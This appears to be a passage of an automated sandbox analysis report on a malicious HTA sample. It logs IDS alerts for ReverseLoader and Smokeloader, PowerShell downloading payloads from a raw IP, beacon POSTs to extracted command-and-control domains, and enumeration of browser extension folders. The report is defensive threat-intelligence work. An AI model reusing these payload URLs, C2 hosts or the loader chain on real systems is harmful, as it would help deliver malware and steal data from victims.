                Source: Yara matchFile source: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta, type: SAMPLE
                Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1827828745.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105130224.00000000049D0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinked
                Source: Binary string: aspnet_compiler.pdb source: djvbaae, 0000000F.00000000.2357331428.0000000000192000.00000002.00000001.01000000.0000000C.sdmp, djvbaae.14.dr
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105130224.00000000049D0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.pdb source: powershell.exe, 00000001.00000002.1934299085.0000000005367000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D62B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,17_2_02D62B15
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D63ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,17_2_02D63ED9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D61D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,17_2_02D61D4A
                Source: C:\Windows\explorer.exeCode function: 18_2_001E30A8 FindFirstFileW,FindNextFileW,FindClose,18_2_001E30A8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0066255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,19_2_0066255C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_030415BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,20_2_030415BE
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_030414D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,20_2_030414D8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_030413FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,20_2_030413FE
                Source: C:\Windows\explorer.exeCode function: 21_2_00711DB0 FindFirstFileW,FindNextFileW,FindClose,21_2_00711DB0
                Source: C:\Windows\explorer.exeCode function: 21_2_00711EB4 FindFirstFileW,FindNextFileW,FindClose,21_2_00711EB4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                Software Vulnerabilities

                barindex
                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 107.172.44.178:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49781 -> 46.173.214.24:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49817 -> 46.173.214.24:80
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.4:49731
                Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 46.173.214.24 80
                Source: Malware configuration extractorURLs: http://prolinice.ga/index.php
                Source: Malware configuration extractorURLs: http://vilendar.ga/index.php
                Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /53/WRFFRGT.txt HTTP/1.1Host: 107.172.44.178Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 142.215.209.78 142.215.209.78
                Source: Joe Sandbox ViewASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 46.173.214.24:80 -> 192.168.2.4:49781
                Source: global trafficHTTP traffic detected: GET /53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.172.44.178Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://siwffuchsxpuu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: prolinice.ga
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: prolinice.ga
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_046B4B90 URLDownloadToFileW,1_2_046B4B90
                Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.172.44.178Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /53/WRFFRGT.txt HTTP/1.1Host: 107.172.44.178Connection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: 1017.filemail.com
                Source: global trafficDNS traffic detected: DNS query: prolinice.ga
                Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://siwffuchsxpuu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: prolinice.ga
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 17:38:08 GMTServer: Apache/2.4.59 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59 ea 90 d6 8f 1b 32 75 08 c5 9a 2d a0 6a 8b fd 6b c4 c2 37 35 48 bd 8c 96 77 e4 62 45 8d 49 72 d0 11 c5 42 47 60 cf 79 cc d5 44 76 86 c6 57 e5 fc f1 b9 98 00 52
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 17:38:16 GMTServer: Apache/2.4.59 (Debian)Content-Length: 409Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
                Source: powershell.exe, 00000001.00000002.1934299085.0000000005367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybe
                Source: powershell.exe, 00000001.00000002.1934299085.0000000005367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1953902747.0000000007260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF
                Source: powershell.exe, 00000001.00000002.1953902747.0000000007260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF4
                Source: powershell.exe, 00000001.00000002.1954134272.0000000007290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF9
                Source: powershell.exe, 00000001.00000002.1954134272.00000000072A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFv
                Source: powershell.exe, 00000001.00000002.1954134272.00000000072A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF~
                Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: powershell.exe, 00000001.00000002.1932388414.0000000002C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: powershell.exe, 00000009.00000002.2161675097.0000000006F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftOZ
                Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: powershell.exe, 00000003.00000002.1824151467.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: powershell.exe, 00000001.00000002.1950833514.0000000005878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1826452749.00000000065A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
                Source: explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
                Source: explorer.exe, 00000011.00000002.2435370827.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2391356204.0000000000538000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2397253387.0000000000767000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3007335205.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2660889863.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.3008863244.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3007619129.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3008824207.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3007631723.0000000000C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
                Source: explorer.exe, 00000011.00000002.2435370827.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2391356204.0000000000538000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2397253387.0000000000767000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3007335205.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2660889863.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.3008863244.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3007619129.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3008824207.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3007631723.0000000000C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
